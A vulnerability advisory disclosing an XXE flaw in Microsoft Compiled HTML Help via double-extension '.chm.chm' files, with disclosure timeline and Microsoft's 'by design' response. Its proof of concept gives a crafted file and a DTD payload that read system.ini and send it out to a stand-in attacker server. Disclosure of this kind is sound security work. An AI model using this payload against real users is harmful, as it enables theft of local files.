[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Microsoft Compiled HTML Help "hh.exe"

Microsoft
Compiled HTML Help is a Microsoft proprietary online help format,
consisting of a collection of HTML pages, an index and other navigation
tools.
The files are compressed and deployed in a binary format with
the extension .CHM, for Compiled HTML. The format is often used for
software documentation.
CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program.

[Vulnerability Type]
Uncompiled .CHM File XML External Entity Injection

[CVE Reference]
N/A

[Security Issue]
CHM
Files are usually created using Microsofts "HTML Help Workshop"
program. However, I find a way to bypass using this program and create
them easily by
simply adding double .chm extension to the file
".chm.chm". Compiled HTML Help "hh.exe" will then respect and open it
processing any JS/HTML/XML inside etc.
Compiled HTML Help is also
vulnerable to XML External Entity attacks allowing remote attackers to
steal and exfiltrate local system files.

Whats interesting about
this one is we can create the file without using the "Microsoft HTML
Help Workshop" program. Also, we can steal files without
having to use the "hhtctrl.ocx" ActiveX control CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods.

While
CHM is already considered a "dangerous" file type and other type of
attacks have already been documented. I thought this was an interesting
way to
create CHM files "Uncompiled" bypassing the default creation steps while stealing local files in the process.

Note: User interaction is required to exploit this vulnerability.

[Exploit/POC]
1) python -m SimpleHTTPServer

2) "XXE.chm.chm"

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<Title>Uncompiled CHM File XXE PoC</Title>
</HEAD>
<BODY>
<xml>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE tastyexploits [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://localhost:81/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml>
</BODY>
</HTML>

3) "payload.dtd"  (hosted in python web-server dir port 8000 above)

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:81?%file;'>">
%all;

Open the "XXE.chm.chm" file and will exfil Windows "system.ini", attacker Server IP is set to localhost using port 81 for PoC.

Tested successfully Windows 7/10

[POC Video URL]
https://www.youtube.com/watch?v=iaxp1iBDWXY

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: April 25, 2019
MSRC Response: "We determined that this behavior is considered to be by design"
July 16, 2019 : Public Disclosure

[+] Disclaimer
The
information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission
is hereby granted for the redistribution of this advisory, provided that
it is not altered except by reformatting it, and
that due credit is
given. Permission is explicitly given for insertion in vulnerability
databases and similar, provided that due credit
is given to the
author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility
for any damage caused
by the use or misuse of this information. The author prohibits any
malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Microsoft Compiled HTML Help / Uncompiled .chm File XML External Entity的更多相关文章

  1. Microsoft Internet Explorer v11 XML External Entity Injection 0day

    [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org[+] Source:  http://hyp3 ...

  2. XML External Entity Injection(XXE)

    写在前面 安全测试fortify扫描接口项目代码,暴露出标题XXE的问题, 记录一下.官网链接: https://www.owasp.org/index.php/XML_External_Entity ...

  3. XXE(XML External Entity attack)XML外部实体注入攻击

    导语 XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击.由于程序在解析输入的XML数据时,解析了攻击者 ...

  4. XML External Entity attack/XXE攻击

    XML External Entity attack/XXE攻击   1.相关背景介绍 可扩展标记语言(eXtensible Markup Language,XML)是一种标记语言,被设计用来传输和存 ...

  5. 【译】Attacking XML with XML External Entity Injection (XXE)

    原文链接:Attacking XML with XML External Entity Injection (XXE) XXE:使用XML外部实体注入攻击XML 在XML中,有一种注入外部文件的方式. ...

  6. XML External Entity attack

    解析外部xml给本地带来的安全隐患. https://en.wikipedia.org/wiki/XML_external_entity_attack An XML External Entity ( ...

  7. 4.XXE (XML External Entity Injection)

    XXE (XML External Entity Injection) 0x01 什么是XXE XML外部实体注入 若是PHP,libxml_disable_entity_loader设置为TRUE可 ...

  8. Fortify漏洞之XML External Entity Injection(XML实体注入)

    继续对Fortify的漏洞进行总结,本篇主要针对  XML External Entity Injection(XML实体注入) 的漏洞进行总结,如下: 1.1.产生原因: XML External ...

  9. Portswigger web security academy:XML external entity (XXE) injection

    Portswigger web security academy:XML external entity (XXE) injection 目录 Portswigger web security aca ...

随机推荐

  1. Systemback制作大于4G的Ubuntu系统镜像

    1 安装Systemback 依此执行如下命令. sudo apt-get update sudo add-apt-repository ppa:nemh/systemback sudo apt-ge ...

  2. 第06组 Alpha冲刺(5/6)

    队名:拾光组 组长博客链接 作业博客链接 团队项目情况 燃尽图(组内共享) 组长:宋奕 过去两天完成了哪些任务 主要完成了个人中心模块的接口设计 完善后端的信息处理 GitHub签入记录 接下来的计划 ...

  3. 工具系列 | VScode VS Live Share 实时编码分享(和你的小伙伴一起写代码吧)

    Visual Studio Live Share能干啥? 分享任何语言,任何应用程序 无论您正在构建什么类型的应用程序,您正在编写什么语言,或者您的操作系统如何:在您需要协作时,Live Share会 ...

  4. 解决VS Code开发Python3语言自动补全功能

    1.打开设置界面 2)使用快捷键组合[Ctrl+Shift+p] . 输入setting,选中首选项的user setting模式设置界面 在打开的User Settings文件界面,搜索:pytho ...

  5. Qt开发经验小技巧11-20

    获取类的属性 const QMetaObject *metaobject = object->metaObject(); int count = metaobject->propertyC ...

  6. matlab学习笔记8 基本绘图命令-三维绘图

    一起来学matlab-matlab学习笔记8 基本绘图命令_6 三维绘图 觉得有用的话,欢迎一起讨论相互学习~Follow Me 参考书籍 <matlab 程序设计与综合应用>张德丰等著 ...

  7. 集群服务器+定时任务(Quartz) 重复执行的问题

    x StackExchange.Redis private readonly IDatabase _db; string key = string.Concat("{自己命名的Redis前缀 ...

  8. Python 图片Resize.py

    #!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 19-7-14 下午4:54 # @Author : RongT import cv2 ...

  9. 【tensorflow基础】TensorFlow查看GPU信息

    re 1. TensorFlow查看GPU信息; end

  10. [LeetCode] 109. Convert Sorted List to Binary Search Tree 把有序链表转成二叉搜索树

    Given a singly linked list where elements are sorted in ascending order, convert it to a height bala ...